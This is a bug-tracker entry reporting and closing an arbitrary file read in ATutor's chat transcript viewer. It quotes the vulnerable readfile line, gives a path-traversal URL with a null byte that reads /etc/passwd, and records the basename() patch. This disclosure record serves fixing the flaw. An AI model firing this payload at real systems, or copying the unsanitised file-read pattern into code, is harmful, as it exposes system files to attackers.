MantisBT

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0005656ATutoratutor.capublic2016-03-19 11:452016-06-30 17:43
Reportermr_me 
Assigned Tomr_me 
PriorityhighSeverityminorReproducibilityalways
StatusclosedResolutionfixed 
PlatformUnixOSOS Version
Product Version2.2.1 
Target Version2.2.1Fixed in Version2.2.1 
Summary0005656: Arbitray file read in mods/_standard/chat/view_transcript.php
DescriptionAuthentication can be bypassed to reach this.

@readfile(AT_CONTENT_DIR . 'chat/'.$_SESSION['course_id'].'/tran/'.$_GET['t'].'.html');

http://172.16.175.152/ATutor/mods/_standard/chat/view_transcript.php?t=../../../../../../../../../etc/passwd%00&h= [^]

Needs a null byte injection, still, exploitable on older versions of php
TagsNo tags attached.
Affects versionSVN
SVN Revision#cbfe7a18a8bf43765064bde452f631c26a9298fe
Attached Files

- Relationships

-  Notes
(0007361)
mr_me (developer)
2016-03-21 10:07

Patch: https://github.com/atutor/ATutor/pull/115 [^]
(0007368)
greg (administrator)
2016-03-23 20:00

added basename() to prevent abitrary file reading
(0007458)
greg (administrator)
2016-06-30 17:43

Close for 2.2.2

- Issue History
Date Modified Username Field Change
2016-03-19 11:45 mr_me New Issue
2016-03-19 11:45 mr_me Status new => assigned
2016-03-19 11:45 mr_me Assigned To => greg
2016-03-21 10:07 mr_me Note Added: 0007361
2016-03-23 20:00 greg SVN Revision# => cbfe7a18a8bf43765064bde452f631c26a9298fe
2016-03-23 20:00 greg Note Added: 0007368
2016-03-23 20:00 greg Status assigned => resolved
2016-03-23 20:00 greg Fixed in Version => 2.2.1
2016-03-23 20:00 greg Resolution open => fixed
2016-03-23 20:00 greg Assigned To greg => mr_me
2016-06-30 17:43 greg Note Added: 0007458
2016-06-30 17:43 greg Status resolved => closed


Copyright © 2000 - 2017 MantisBT Team
Powered by Mantis Bugtracker